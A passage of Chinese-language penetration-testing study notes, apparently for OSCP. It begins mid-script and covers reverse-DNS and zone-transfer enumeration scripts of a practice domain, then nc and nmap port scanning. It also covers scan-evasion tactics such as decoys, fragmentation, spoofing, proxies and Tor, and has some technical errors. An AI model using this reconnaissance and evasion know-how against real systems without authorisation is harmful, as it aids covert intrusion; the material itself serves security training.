186 if [ ${#ip} -gt $max_ip_len ]; then
187 max_ip_len=${#ip}
188 fi
189 done < "$RESULT_FILE"
190 
191 # 添加边距
192 max_sub_len=$((max_sub_len + 2))
193 max_ip_len=$((max_ip_len + 2))
194 if [ $max_sub_len -lt 20 ]; then max_sub_len=20; fi
195 if [ $max_ip_len -lt 15 ]; then max_ip_len=15; fi
196 
197 # 创建表格顶部
198 printf "┌─%s─┬─%s─┐\n" "$(printf '%*s' "$max_sub_len" "" | tr ' ' '-')" \
199 "$(printf '%*s' "$max_ip_len" "" | tr ' ' '-')"
200 
201 # 表格标题
202 printf "│ %-${max_sub_len}s │ %-${max_ip_len}s │\n" "Subdomain" "IP Address"
203 printf "├─%s─┼─%s─┤\n" "$(printf '%*s' "$max_sub_len" "" | tr ' ' '-')" \
204 "$(printf '%*s' "$max_ip_len" "" | tr ' ' '-')"
205 
206 # 表格内容
207 while IFS= read -r line; do
208 subdomain=$(echo "$line" | awk '{print $1}')
209 ip=$(echo "$line" | awk '{print $4}')
210 
211 # 截断超长字段
212 subdomain=${subdomain:0:60}
213 ip=${ip:0:15}
214 
215 printf "│ %-${max_sub_len}s │ %-${max_ip_len}s │\n" "$subdomain" "$ip"
216 done < "$RESULT_FILE"
217 
218 # 表格底部
219 printf "└─%s─┴─%s─┘\n" "$(printf '%*s' "$max_sub_len" "" | tr ' ' '-')" \
220 "$(printf '%*s' "$max_ip_len" "" | tr ' ' '-')"
221 echo
222fi
223
224# 保存原始输出
225if [ -s "$RESULT_FILE" ]; then
226 LOG_FILE="${CSV_OUTPUT%.csv}.log"
227 cp "$RESULT_FILE" "$LOG_FILE"
228else
229 LOG_FILE=""
230fi
231
232# 输出统计信息
233echo "============================="
234echo "扫描完成"
235echo "结束时间: $(date)"
236echo "总耗时: $((TOTAL_TIME / 60)) 分钟 $((TOTAL_TIME % 60)) 秒"
237echo "共扫描: $COUNT 个子域名"
238echo "发现: $FOUND 个活动子域名"
239if [ -n "$LOG_FILE" ]; then
240 echo "原始输出: $LOG_FILE"
241fi
242echo "CSV文件: $CSV_OUTPUT"
243echo "============================="
244
245# 清理临时文件
246rm -f "$RESULT_FILE"

反向C段IP爆破

从之前的扫描结果看，这个域名大多数解析到167.114.21.x的C段IP地址，说明这个公司包揽了这个段上的大多数连续的服务器，用来承载业务，那么就有可能存在这个C段中，没有域名，或者说还没来得及挂上域名的测试站点，或者说一个公司某个部门、总部、第三方委托的服务器商之类的角色管理这些服务器，而megacorpone.com这个域名只是他们子公司域名之一，可能还存在其他域名，只要是存在业务关系的，他们的服务器之间一定会存在业务关联，这时候就需要IP反向搜索爆破新域名。

1for Cip in $(seq 50 100); do host 167.114.21.$Cip; done | grep -v "not fou
2nd"
3for Cip in $(seq 0 254); do host 167.114.21.$Cip; done | grep -v "not fou
4nd"

同样的，我们用AI写一个小工具

 1#!/bin/bash
 2
 3# 脚本名称: reverse_dns_scan.sh
 4# 功能: 反向DNS扫描工具，支持进度显示、格式化表格和CSV导出
 5# 用法: ./reverse_dns_scan.sh 网络地址 起始IP 结束IP
 6
 7# 错误处理函数
 8die() {
 9 echo "错误: $1" >&2
 10 echo "用法: $0 网络地址 起始IP 结束IP"
 11 exit 1
 12}
 13
 14# 检查参数
 15if [ $# -ne 3 ]; then
 16 die "需要三个参数：网络地址、起始IP和结束IP"
 17fi
 18
 19NETWORK="$1"
 20START_IP="$2"
 21END_IP="$3"
 22
 23# 验证IP范围
 24if ! [[ "$START_IP" =~ ^[0-9]+$ ]] || ! [[ "$END_IP" =~ ^[0-9]+$ ]]; then
 25 die "起始IP和结束IP必须是数字"
 26fi
 27
 28if [ "$START_IP" -gt "$END_IP" ]; then
 29 die "起始IP不能大于结束IP"
 30fi
 31
 32# 设置输出文件
 33SAFE_NETWORK=$(echo "$NETWORK" | tr -cd '[:alnum:]._-')
 34CSV_OUTPUT="${SAFE_NETWORK}_${START_IP}-${END_IP}_reverse_dns.csv"
 35
 36# 创建临时文件存储结果
 37RESULT_FILE=$(mktemp)
 38
 39# 计算总数
 40TOTAL=$((END_IP - START_IP + 1))
 41
 42# 开始扫描
 43echo "============================="
 44echo "开始反向DNS扫描"
 45echo "网络地址: $NETWORK"
 46echo "IP范围: $START_IP - $END_IP"
 47echo "扫描数量: $TOTAL"
 48echo "开始时间: $(date)"
 49echo "CSV输出文件: $CSV_OUTPUT"
 50echo "============================="
 51echo
 52
 53START_TIME=$(date +%s)
 54COUNT=0
 55FOUND=0
 56
 57# 初始化CSV文件
 58echo "IP地址,域名" > "$CSV_OUTPUT"
 59
 60# 主扫描循环
 61for CIP in $(seq "$START_IP" "$END_IP"); do
 62 IP="${NETWORK}.${CIP}"
 63 
 64 # 进度统计
 65 ((COUNT++))
 66 
 67 # 计算时间和进度
 68 CURRENT_TIME=$(date +%s)
 69 ELAPSED_SEC=$((CURRENT_TIME - START_TIME))
 70 if [ $COUNT -gt 0 ]; then
 71 AVG_TIME_PER_REC=$((ELAPSED_SEC / COUNT))
 72 REMAINING=$((TOTAL - COUNT))
 73 ESTIMATED_REMAINING_SEC=$((AVG_TIME_PER_REC * REMAINING))
 74 MINS_REMAINING=$((ESTIMATED_REMAINING_SEC / 60))
 75 SECS_REMAINING=$((ESTIMATED_REMAINING_SEC % 60))
 76 fi
 77 
 78 # 计算进度百分比
 79 PERCENT=$((COUNT * 100 / TOTAL))
 80 
 81 # 创建简洁的当前查询显示
 82 display_query="$IP"
 83 if [ ${#IP} -gt 25 ]; then
 84 display_query="${IP:0:22}..."
 85 fi
 86 
 87 # 创建进度条
 88 bar=""
 89 for ((i=0; i<50; i++)); do
 90 if [ $i -lt $((PERCENT / 2)) ]; then
 91 bar="${bar}#"
 92 else
 93 bar="${bar}."
 94 fi
 95 done
 96 
 97 # 显示进度信息
 98 printf "进度: [%-50s] %3d%% | %d/%d | 时间: %02d:%02d | ETA: %02d:%02d | 当前: %s\r" \
 99 "$bar" $PERCENT $COUNT $TOTAL \
100 $((ELAPSED_SEC / 60)) $((ELAPSED_SEC % 60)) \
101 $MINS_REMAINING $SECS_REMAINING \
102 "$display_query"
103 
104 # 执行反向DNS查询
105 result=$(host "$IP" 2>/dev/null)
106 
107 # 处理结果
108 if [[ "$result" == *"domain name pointer"* ]]; then
109 ((FOUND++))
110 
111 # 提取域名
112 domain=$(echo "$result" | grep -oP 'domain name pointer \K[^.]+(\.[^.]+)+' | head -1)
113 
114 # 1. 输出原始格式结果
115 echo "$result"
116 
117 # 2. 保存结果用于表格
118 echo "$IP,$domain" >> "$RESULT_FILE"
119 
120 # 3. 添加到CSV文件
121 echo "$IP,$domain" >> "$CSV_OUTPUT"
122 fi
123done
124
125# 清除进度行
126printf "\n\n"
127
128# 计算总耗时
129END_TIME=$(date +%s)
130TOTAL_TIME=$((END_TIME - START_TIME))
131
132# 显示表格总结
133if [ -s "$RESULT_FILE" ]; then
134 echo "============================="
135 echo "扫描结果汇总 (反向DNS记录)"
136 echo "============================="
137 echo
138 
139 # 确保表格对齐
140 max_ip_len=15 # "IP地址" 标题长度
141 max_domain_len=20 # "域名" 标题长度
142 
143 # 读取结果计算最大长度
144 while IFS=, read -r ip domain; do
145 if [ ${#ip} -gt $max_ip_len ]; then
146 max_ip_len=${#ip}
147 fi
148 
149 if [ ${#domain} -gt $max_domain_len ]; then
150 max_domain_len=${#domain}
151 fi
152 done < "$RESULT_FILE"
153 
154 # 添加边距
155 max_ip_len=$((max_ip_len + 2))
156 max_domain_len=$((max_domain_len + 2))
157 if [ $max_ip_len -lt 15 ]; then max_ip_len=15; fi
158 if [ $max_domain_len -lt 20 ]; then max_domain_len=20; fi
159 
160 # 创建表格顶部
161 printf "┌─%s─┬─%s─┐\n" "$(printf '%*s' "$max_ip_len" "" | tr ' ' '-')" \
162 "$(printf '%*s' "$max_domain_len" "" | tr ' ' '-')"
163 
164 # 表格标题
165 printf "│ %-${max_ip_len}s │ %-${max_domain_len}s │\n" "IP地址" "域名"
166 printf "├─%s─┼─%s─┤\n" "$(printf '%*s' "$max_ip_len" "" | tr ' ' '-')" \
167 "$(printf '%*s' "$max_domain_len" "" | tr ' ' '-')"
168 
169 # 表格内容
170 while IFS=, read -r ip domain; do
171 printf "│ %-${max_ip_len}s │ %-${max_domain_len}s │\n" "$ip" "$domain"
172 done < "$RESULT_FILE"
173 
174 # 表格底部
175 printf "└─%s─┴─%s─┘\n" "$(printf '%*s' "$max_ip_len" "" | tr ' ' '-')" \
176 "$(printf '%*s' "$max_domain_len" "" | tr ' ' '-')"
177 echo
178fi
179
180# 输出统计信息
181echo "============================="
182echo "扫描完成"
183echo "结束时间: $(date)"
184echo "总耗时: $((TOTAL_TIME / 60)) 分钟 $((TOTAL_TIME % 60)) 秒"
185echo "共扫描: $COUNT 个IP地址"
186echo "发现: $FOUND 个反向DNS记录"
187echo "CSV文件: $CSV_OUTPUT"
188echo "============================="
189
190# 清理临时文件
191rm -f "$RESULT_FILE"

对比可以发现，反向查找出来了一些正向用字典没又找到的子域名。

用命令来辅助我们发现新域名，这些新域名，新IP中可能包含易于攻击的系统。

1comm -13 \
2 <(awk -F, 'NR>1{print $1}' megacorpone.com.csv | sort -u) \
3 <(awk -F, 'NR>1 && $2~/megacorpone\.com$/{print $2}' 167.114.21_50-100_reverse_dns.csv | sort -u) \
4| xargs -I{} grep -i ",{}$" 167.114.21_50-100_reverse_dns.csv \
5| column -t -s, -N "IP地址,域名"

对两个CSV细致分析的还可以用下面这个脚本

 1#!/bin/bash
 2# 脚本名称: dns_analyzer.sh
 3# 功能: 智能分析DNS扫描CSV文件，支持子域名统计和反向DNS统计
 4# 用法: ./dns_analyzer.sh 输入文件.csv
 5
 6# 错误处理
 7die() {
 8 echo "错误: $1" >&2
 9 exit 1
 10}
 11
 12# 检查参数
 13if [ $# -ne 1 ]; then
 14 die "用法: $0 输入文件.csv"
 15fi
 16
 17INPUT_FILE="$1"
 18if [ ! -f "$INPUT_FILE" ]; then
 19 die "文件不存在: $INPUT_FILE"
 20fi
 21
 22# 检测文件类型
 23if head -1 "$INPUT_FILE" | grep -qE "子域名,IP地址|subdomain,ip"; then
 24 echo "检测到子域名扫描CSV文件"
 25 FILE_TYPE="subdomain"
 26elif head -1 "$INPUT_FILE" | grep -qE "IP地址,域名|ip,domain"; then
 27 echo "检测到反向DNS扫描CSV文件"
 28 FILE_TYPE="reverse"
 29else
 30 die "无法识别CSV文件类型 - 请确保文件包含正确的标题行"
 31fi
 32
 33# 美观的域名列表输出函数
 34pretty_print_domains() {
 35 local domains="$1"
 36 local max_length=0
 37 local count=0
 38 
 39 # 将域名拆分为数组
 40 IFS=',' read -ra DOMAIN_ARRAY <<< "$domains"
 41 count=${#DOMAIN_ARRAY[@]}
 42 
 43 # 计算最大域名长度
 44 for domain in "${DOMAIN_ARRAY[@]}"; do
 45 domain=$(echo "$domain" | xargs) # 去除前后空格
 46 len=${#domain}
 47 if (( len > max_length )); then
 48 max_length=$len
 49 fi
 50 done
 51 
 52 # 计算列数和每列宽度
 53 local columns=$(( $(tput cols) / (max_length + 4) ))
 54 if (( columns < 1 )); then columns=1; fi
 55 if (( columns > 6 )); then columns=6; fi
 56 
 57 # 计算行数
 58 local rows=$(( (count + columns - 1) / columns ))
 59 
 60 # 格式化输出
 61 echo
 62 for (( i=0; i<rows; i++ )); do
 63 printf " "
 64 for (( j=0; j<columns; j++ )); do
 65 idx=$(( i + j * rows ))
 66 if (( idx < count )); then
 67 domain=$(echo "${DOMAIN_ARRAY[$idx]}" | xargs)
 68 printf "%-*s" $((max_length + 4)) "$domain"
 69 fi
 70 done
 71 echo
 72 done
 73 echo
 74}
 75
 76# 处理子域名文件
 77process_subdomain() {
 78 local file="$1"
 79 
 80 # 按IP排序
 81 echo -e "\n\033[1;34m按IP地址排序:\033[0m"
 82 awk -F, 'NR>1' "$file" | sort -t, -k2 | column -t -s, -N "子域名,IP地址"
 83 
 84 # IP重复统计
 85 echo -e "\n\033[1;34mIP地址重复统计:\033[0m"
 86 awk -F, 'NR>1 {ip_count[$2]++} END {
 87 for (ip in ip_count) {
 88 printf "%d\t%s\n", ip_count[ip], ip
 89 }
 90 }' "$file" | sort -nr | column -t -N "重复次数,IP地址"
 91 
 92 # 重复最多的IP
 93 echo -e "\n\033[1;34m重复最多的IP地址:\033[0m"
 94 awk -F, 'NR>1 {ip_count[$2]++} END {
 95 max_count = 0
 96 for (ip in ip_count) {
 97 if (ip_count[ip] > max_count) {
 98 max_count = ip_count[ip]
 99 max_ip = ip
100 }
101 }
102 printf "IP地址: %s\n重复次数: %d\n", max_ip, max_count
103 }' "$file"
104}
105
106# 处理反向DNS文件
107process_reverse() {
108 local file="$1"
109 
110 # 主域名统计
111 echo -e "\n\033[1;34m主域名出现统计:\033[0m"
112 awk -F, 'NR>1 && $2 != "" {
113 # 提取主域名
114 n = split($2, parts, ".")
115 if (n > 1) {
116 main_domain = parts[n-1] "." parts[n]
117 domain_count[main_domain]++
118 }
119 } END {
120 for (d in domain_count) {
121 printf "%d\t%s\n", domain_count[d], d
122 }
123 }' "$file" | sort -nr | column -t -N "出现次数,主域名"
124 
125 # 重复最多的主域名
126 echo -e "\n\033[1;34m重复最多的主域名:\033[0m"
127 awk -F, 'NR>1 && $2 != "" {
128 n = split($2, parts, ".")
129 if (n > 1) {
130 main_domain = parts[n-1] "." parts[n]
131 domain_count[main_domain]++
132 }
133 } END {
134 max_count = 0
135 for (d in domain_count) {
136 if (domain_count[d] > max_count) {
137 max_count = domain_count[d]
138 max_domain = d
139 }
140 }
141 printf "主域名: %s\n出现次数: %d\n", max_domain, max_count
142 }' "$file"
143 
144 # 主域名关联的完整域名（美观格式）
145 echo -e "\n\033[1;34m主域名关联的完整域名:\033[0m"
146 awk -F, 'BEGIN {print "开始收集域名..."} 
147 NR>1 && $2 != "" {
148 n = split($2, parts, ".")
149 if (n > 1) {
150 main_domain = parts[n-1] "." parts[n]
151 if (!(main_domain in domain_list)) {
152 domain_list[main_domain] = $2
153 } else {
154 domain_list[main_domain] = domain_list[main_domain] "," $2
155 }
156 # print "收集: " $2 " -> " main_domain
157 }
158 } END {
159 print "收集完成，开始输出..."
160 for (d in domain_list) {
161 printf "%s:%s\n", d, domain_list[d]
162 }
163 }' "$file" > /tmp/domain_groups.txt
164 
165 while IFS=: read -r domain_group domains; do
166 echo -e "\033[1;32m$domain_group:\033[0m"
167 pretty_print_domains "$domains"
168 done < /tmp/domain_groups.txt
169 rm -f /tmp/domain_groups.txt
170}
171
172# 根据文件类型执行相应处理
173case "$FILE_TYPE" in
174 subdomain)
175 process_subdomain "$INPUT_FILE"
176 ;;
177 reverse)
178 process_reverse "$INPUT_FILE"
179 ;;
180 *)
181 die "未知文件类型"
182 ;;
183esac
184
185echo -e "\n\033[1;32m分析完成!\033[0m"

区域传输

DNS区域传输基本上是相关DNS服务器之间的数据库复制，其中区域文件从主DNS服务器复制到从DNS服务器。区域文件包含所有DNS的列表为该区域配置的名称。区域传输应该只允许授权的从DNS但是许多管理员错误地配置了他们的DNS服务器，在这些情况下，任何人都问DNS服务器区域通常会收到一个副本。这相当于把公司的网络布局放在硬盘上交给黑客。所有的名字，服务器的地址和功能可能会暴露在窥探者的视线之下。成功的区域传输不会直接导致网络破坏，尽管它确实有助于这个过程（主要是信息泄露）。执行分区传输的host命令语法如下：

1host -l megacorpone.com ns1.megacorpone.com

可以看到ns2是有区域传输漏洞的。

此服务器允许区域传输，并提供区域文件的完整转储megacorpone.com域名，提供方便的IP地址列表和相应的DNS主机名! megacorpone.com域需要检查的DNS服务器非常少。然而，一些较大的组织可能托管许多DNS服务器，或者我们可能想要尝试区域传输请求针对给定域中的所有DNS服务器。Bash脚本可以帮助完成这项任务。要尝试使用host命令进行区域传输，我们需要两个参数：名称服务器地址和域名。我们可以使用以下命令获取给定域的名称服务器命令:

1host -t ns megacorpone.com | cut -d " " -f 4

 1#!/bin/bash
 2# Simple Zone Transfer Bash Script
 3# $1 is the first argument given after the bash script
 4# Check if argument was given, if not, print usage
 5if [ -z "$1" ]; then
 6 echo "[*] Simple Zone transfer script"
 7 echo "[*] Usage : $0 <domain name> "
 8 exit 0
 9fi
10# if argument was given, identify the DNS servers for the domain
11for server in $(host -t ns $1 | cut -d " " -f4); do
12 # For each of these servers, attempt a zone transfer
13 host -l $1 $server |grep "has address"
14done

Kali自带的DNS枚举工具

DNSrecon

1sudo apt update && sudo apt install dnsrecon -y
2dnsrecon -h
3dnsrecon -d megacorpone.com
4dnsrecon -d megacorpone.com -t brt -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt # 子域名暴力破解
5dnsrecon -r 167.114.21.0-167.114.21.255 # 反向爆破
6dnsrecon -d megacorpone.com -t axfr # 区域传送漏洞检测

DNSenum

1dnsenum zonetransfer.me
2dnsenum -f /usr/share/wordlists/dnsmap.txt megacorpone.com
3dnsenum -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt megacorpone.com

7.1.6.3练习

查找megacorpone.com域的DNS服务器。
编写一个小脚本，尝试使用更高级别从megacorpone.com进行区域传输，脚本语言，如Python、Perl或Ruby。
重新创建上面的示例，并使用dnsrecon尝试从megacorpone.com。

2.改写小脚本

完整脚本可以关注我公众号后台回复关键字领取。

python使用示例：

# 基本用法
python3 subdomain_finder.py megacorpone.com

# 自定义字典和输出
python3 subdomain_finder.py megacorpone.com \
 -w custom.txt \
 -o results.csv

端口扫描

端口扫描是检查远程计算机上的TCP或UDP端口的过程，目的是检测目标上正在运行的服务以及可能存在的潜在攻击媒介。

在一些网络基础设施落后的国家，简单的扫描就有可能导致网站崩溃（DDOS），所以一些国家将扫描视为违法行为。在中国大多数云服务器都能抗住普通扫描的流量。

TCP/UDP扫描使用NC

TCP扫描

最简单的TCP端口扫描技术通常称为CONNECT扫描，它依赖于三向TCP握手195机制。设计此机制是为了使两个尝试进行通信的主机可以在传输任何数据之前协商网络TCP套接字连接的参数。在没有专门的扫描工具的时候，也可以使用Netcat来改造一下。

1 nc -nv -w 1 -z 192.168.1.1 3388-3390
2 sudo tshark -i eth0 -f "tcp portrange 3388-3390"

UDP扫描

由于UDP是无状态的，并且不涉及三向握手，因此UDP端口扫描的机制不同于TCP。udp是无状态尽力传输协议，没有三次握手机制，使用针对协议的udp扫描提高准确度，发送udp空包，端口开放服务器无响应，端口关闭返回icmp端口不可达。此机制扫描结果不完全准确，但是很多攻击向量（应用处理异常，FW过滤icmp包），而且nc很小，主要是在内网收到限制的时候使用。

1nc -nv -u -z -w 1 192.168.1.1 160-162
2sudo tshark -i eth0 -f "udp portrange 160-162"

Nmap端口扫描

虽然Nmap扫描功能很强大，但是很多的nmap扫描选项需要访问 raw sockets，因此需要sudo执行，否则扫描能力受限。很多防火墙都对Nmap做了限制。

对防火墙设置一些规则，来观察Nmap产生的流量有多大。

步骤 1：设置防火墙规则（允许特定 IP 通行）

sudo iptables -I INPUT 1 -s 38.100.193.70 -j ACCEPT
sudo iptables -I OUTPUT 1 -d 38.100.193.70 -j ACCEPT

作用：
- 允许来自 38.100.193.70 的入站流量（INPUT 链）。
- 允许发送到 38.100.193.70 的出站流量（OUTPUT 链）。
目的：确保后续 nmap 扫描不会被防火墙拦截，同时防火墙会记录流量统计。注意 38.100.193.70 是OSCP官方给的练手网站的IP地址，这个IP是会变动的，请根据host的结果调整。

步骤 2：重置防火墙计数器

sudo iptables -Z

作用：清零所有 iptables 规则的流量计数器（包数 pkts 和字节数 bytes）。
目的：为后续扫描流量统计做准备，确保计数从零开始。

步骤 3：执行第一次端口扫描（默认扫描）

sudo nmap 38.100.193.70

作用：扫描目标 IP 的 常用 1000 个端口。
目的：触发与目标 IP 的网络通信，防火墙会记录流量。

步骤 4：查看流量统计（第一次）

sudo iptables -vn -L

作用：查看防火墙规则详情：
- -v：显示详细计数（包数、字节数）。
-n：不解析 IP 和端口（直接显示数字）。

步骤 5：再次重置计数器

sudo iptables -Z

目的：为第二次扫描准备干净的计数起点。

步骤 6：执行第二次端口扫描（全端口扫描）

nmap -p- 38.100.193.70

作用：扫描目标 IP 的 全端口（1-65535），此操作耗时较长（约 10-30 分钟）。
目的：触发更大规模的流量，对比两次扫描的流量差异。

步骤 7：查看最终流量统计

sudo iptables -vn -L

作用：显示第二次扫描后的流量统计。
目的：
- 比较 pkts 和 bytes 与第一次扫描的差异（全端口扫描的流量更大）。
- 验证防火墙规则是否正确捕获流量。

结束后清理规则

# 删除添加的规则（避免影响后续操作）
sudo iptables -D INPUT -s 38.100.193.70 -j ACCEPT
sudo iptables -D OUTPUT -d 38.100.193.70 -j ACCEPT

C段全端口扫描大约消耗1gb流量，大段扫描的时候应该考虑带宽、速度、流量等问题。如果大量的去扫，还没有挂代理池的情况下，你短时间目标防火墙接搜到一个G的流量，百分百会反制封锁你的IP地址。一般扫描，最好挂代理，或者IP伪造（治标不治本），在这种情况下才可以做大量的暴力扫描，不然很容易出事。

Nmap的SYN“隐蔽”扫描

Nmap默认使用SYN扫描，不完成三次握手，信息未达应用层，不产生应用层日志（网络层检测），快速。现代防火墙普遍具有半开连接的检测能力，所谓的隐蔽扫描，一点都不隐蔽，反倒是对小白有误导。

1. 什么是 SYN 扫描 (`-sS`)?

TCP 连接建立基础：

正常的 TCP 连接需要完成“三次握手”：
1. 客户端 -> 服务器：发送 SYN 包 (请求建立连接)
2. 服务器 -> 客户端：发送 SYN-ACK 包 (同意建立连接)
3. 客户端 -> 服务器：发送 ACK 包 (确认连接建立，数据可开始传输)
SYN 扫描的原理：
- Nmap 扮演客户端，向目标端口发送一个伪造源地址的 SYN 包 (第 1 步)。
- 如果目标端口开放：目标主机会回应一个 SYN-ACK 包 (第 2 步)。
- 关键点来了：Nmap 看到 SYN-ACK 回应后，不会发送完成握手的 ACK 包 (第 3 步)！相反，它发送一个 RST (复位) 包来立即终止这个半开的连接。
- 如果目标端口关闭：目标主机会回应一个 RST 包。
- 如果目标端口 被过滤（防火墙拦截）：Nmap 通常收不到任何回应，或者收到 ICMP 错误消息。
为何在应用层“隐蔽”：
- 由于 Nmap 没有发送最后的 ACK 来完成握手，TCP 连接从未真正建立。
- 因此，目标端口上监听的应用程序服务程序（如 Web 服务器、数据库服务）根本没有被激活。操作系统内核的网络协议栈在处理到 SYN-ACK 回复这一步后就因为收到 RST 而终止连接。
- 结果：应用层日志里通常找不到这次扫描的记录。 应用服务完全不知道有人尝试连接过。

2. 为何“对小白有误导”？为什么说“一点都不隐蔽”？

虽然 SYN 扫描避开了应用层日志，但这并不意味着它在网络层面是隐蔽的或不留下痕迹。主要的误导在于初学者可能会认为“不在应用日志里 == 完全隐身”。这是错误的认知。

现代防火墙/IDS/IPS 的检测能力：
- 状态检测 (Stateful Inspection)： 这是现代防火墙最基本、最核心的功能之一。防火墙会跟踪所有连接的状态。当它看到一个进来的 SYN 包，但随后看到的是客户端的 RST 包（而不是正常的 ACK）时，它就知道这个连接没有完成正常的三次握手。这是一个非常明显的异常行为特征。
- 检测 SYN 扫描模式： 高级安全设备会分析网络流量模式。短时间内（几秒或几分钟内）向大量不同端口发送 SYN 包，并且每个连接都停留在“半开”状态（即没有后续的 ACK），这极其符合 SYN 端口扫描的特征模式。安全设备可以很容易地通过这种流量特征或速率检测出扫描行为。
- 记录和告警： 虽然应用层服务没日志，但防火墙、入侵检测系统 (IDS)、入侵防御系统 (IPS) 和专业的网络安全监控 (NSM) 平台非常擅长检测、记录和产生大量的告警来报告 SYN 扫描活动。这些日志和告警通常包含源 IP、时间戳、扫描的端口数量等信息。
- 生成“防火墙日志”： 防火墙会记录这些被检测到的扫描包（丢弃的或被接受的半开连接），而这些日志是网络管理员和安全分析师最常查看的地方。
总结 “一点都不隐蔽”： 虽然 SYN 扫描避开了最表层（应用日志），但它在网络层/传输层留下了极其清晰、易于被现代安全设备识别的特征指纹。在稍有安全防护措施的网络中，这样的扫描就像是黑夜里点燃的信号弹一样明显。安全运维人员第一时间就能看到防火墙或 SIEM 系统发出的 SYN Flood 或端口扫描告警。

3. 怎么达到（相对）隐蔽的目的？

绝对的隐蔽在互联网扫描中几乎是不可能的。防御方有多种手段（流量监控、蜜罐、ISP 合作等）来检测扫描活动。我们的目标通常是降低检测率、减少告警噪音、延缓被发现的时间、避免被轻易追踪或封禁。一些更隐蔽的扫描技术包括：

FIN 扫描 (-sF)， NULL 扫描 (-sN)， Xmas 扫描 (-sX):
- 原理： 利用 TCP RFC 规定的一个“小漏洞”：当一个关闭的端口收到不携带 SYN、ACK 或 RST 标志位的怪异包（如只带 FIN、只带 NULL 标志、或者组合了 FIN/URG/PSH 像圣诞树灯一样 - 故名 Xmas）时，应该回复一个 RST 包。而开放的端口则应该忽略这种不符合连接状态的包，不回复。
- 相对隐蔽性： 这种扫描不会尝试建立连接（没有 SYN 包），不是半开连接。它们更像是“敲门试探”。状态防火墙跟踪连接状态时，这些包属于不连接任何现有流量的“异常包”，更难以被仅依赖状态检测的设备识别为扫描（虽然专门检测端口扫描的设备仍然可能抓到）。它们模仿的是连接关闭后残留的迷途包。
- 局限性： 很多非 Unix 系统（如 Windows）的 TCP 栈不严格遵守 RFC，无论端口开放与否，都一律回复 RST。这使得这些扫描对 Windows 主机无效。效果高度依赖于目标系统实现。
ACK 扫描 (-sA):
- 原理： 只发送一个设置了 ACK 位的 TCP 包（通常这是三次握手之后的数据包才会有的标志）。不开放端口的防火墙或无状态防火墙会允许 ACK 到达主机，主机根据本地连接状态（肯定没有这个连接）回复一个 RST。而开放端口且配置了严格状态防火墙的服务器可能会直接丢弃这个 ACK，或者服务器回复 RST 但防火墙阻止了（取决于防火墙规则）。
- 目的： 主要用于探测目标主机防火墙的状态和规则（是否有状态检测？是否过滤入站包？是否屏蔽特定端口？），而不是直接判断端口开放与否（虽然可以通过是否有 RST 回复间接推断端口是否被防火墙过滤）。本身不那么像端口扫描，更像是网络设备探测。
- 相对隐蔽性： 单个 ACK 包在大量合法流量中不太起眼。不易被简单的 SYN 扫描检测规则发现。
Idle / Zombie 扫描 (-sI)：
- 原理： 这是最隐蔽的扫描技术之一。利用一个网络上的空闲主机（僵尸/Zombie）的 IP 标识值 (IP ID) 来间接推断目标端口的开放状态。整个过程 Nmap 自身 IP 完全不直接与目标主机通信，所有通信都由 Zombie 发起（或对 Zombie 发起的伪造包做出响应）。
- 相对隐蔽性： 极高的隐蔽性。目标主机看到的扫描来源是 Zombie 主机，而不是你的扫描机（源 IP 欺骗）。目标主机与 Zombie 主机之间的交互（探测包）更像是正常的、零星的网络试探。
- 复杂性和局限性： 实施非常复杂（需要找到合适的 Zombie 主机，其 IP ID 需是可预测增长的），成功率受很多因素影响（Zombie 的网络活动、路由过滤等）。效率较低。
降低检测率的关键策略 (与扫描技术结合使用)：
- 极慢速率 (--scan-delay, --max-rate): 将扫描速度降至非常低（如每秒甚至每分钟几个包），模仿正常用户的间歇性访问，融入背景噪声。这是最有效的隐蔽手段之一，但耗时极长。
- 分散时间 (-T ): 使用 -T 0 (Paranoid) 或 -T 1 (Sneaky) 等最慢的时序模板，人为引入大量随机延迟。
- 诱饵扫描 (-D)： 指定多个诱饵 IP（-D decoy1,decoy2,decoy3,ME）。这样目标会看到来自大量不同 IP 的扫描（包括诱饵和你的真实 IP），增加了追踪真实源的难度。需要诱饵 IP 确实存在且在网络上可达才能有效混淆。
- 源端口伪装 (-g/--source-port)： 使用常见的、被认为合法的源端口（如 HTTP/80, DNS/53），有时可以骗过非常简陋的基于端口号的过滤规则。
- 分片扫描 (-f, --mtu)： 将扫描包分片发送，增加防火墙/IDS 重组和分析内容的难度（但很多设备能重组分片）。
- 使用代理链或 Tor： 通过层层代理或 Tor 网络进行扫描，隐藏扫描源的真实 IP 地址。Tor 出口节点 IP 容易被封禁且扫描速度极慢。

总结

SYN 扫描 (-sS) 原理： 发送 SYN，接收 SYN-ACK 后立即发送 RST，制造“半开连接”，不建立完整连接，避开应用层日志。
误导性/不隐蔽： 因其明显的“短时间大量半开连接”特征，极易被现代状态防火墙、IDS/IPS 通过状态跟踪和流量模式分析检测到并告警。它在网络防御层留下的痕迹非常深，对新手造成了“应用层没日志=没人发现”的错误印象。
（相对）隐蔽方法： 使用非常规扫描类型 (FIN, NULL, Xmas, ACK, Idle/Zombie)，并最重要的结合极慢的扫描速率 (--scan-delay, -T 0/1)，辅以诱饵 (-D)、源端口伪装 (-g) 或代理/Tor 等策略。“慢”常常是最大的隐蔽武器。 但记住，没有扫描是真正完全隐形的。

扫描命令：

1sudo nmap 38.100.193.70 -sS
2sudo nmap 38.100.193.70 -sT
3sudo nmap 38.100.193.70 -sU
4sudo nmap 38.100.193.70 -sS -sU
5sudo nmap 38.100.193.70 -sn
6sudo nmap 38.100.193.70 -O
7sudo nmap 38.100.193.70 -sV -A
8sudo nmap 38.100.193.70 --script = smb-os-discovery
9sudo nmap 38.100.193.70 --script = dns-zone-transfer

命令解析

sudo nmap 38.100.193.70 -sS
- 作用：TCP SYN 扫描（半开扫描）。
- 原理：发送 SYN 包，收到 SYN-ACK 即判断端口开放（不完成三次握手），速度快且隐蔽（不触发应用层日志）。
- 权限：需要 sudo（需构造原始数据包）。
sudo nmap 38.100.193.70 -sT
- 作用：TCP 连接扫描。
- 原理：完成完整的三次握手。速度慢但准确性高，适用于无 sudo 权限时，但会触发应用层日志。
sudo nmap 38.100.193.70 -sU
- 作用：UDP 扫描。
- 原理：向 UDP 端口发送探测包，通过响应判断状态（如 DNS/DHCP 服务）。速度极慢（UDP 无响应重传机制）。
sudo nmap 38.100.193.70 -sS -sU
- 作用：组合 TCP SYN 扫描 + UDP 扫描。
- 用途：全面检测目标机器的 TCP/UDP 开放端口。
sudo nmap 38.100.193.70 -sn
- 作用：主机发现（Ping 扫描）。
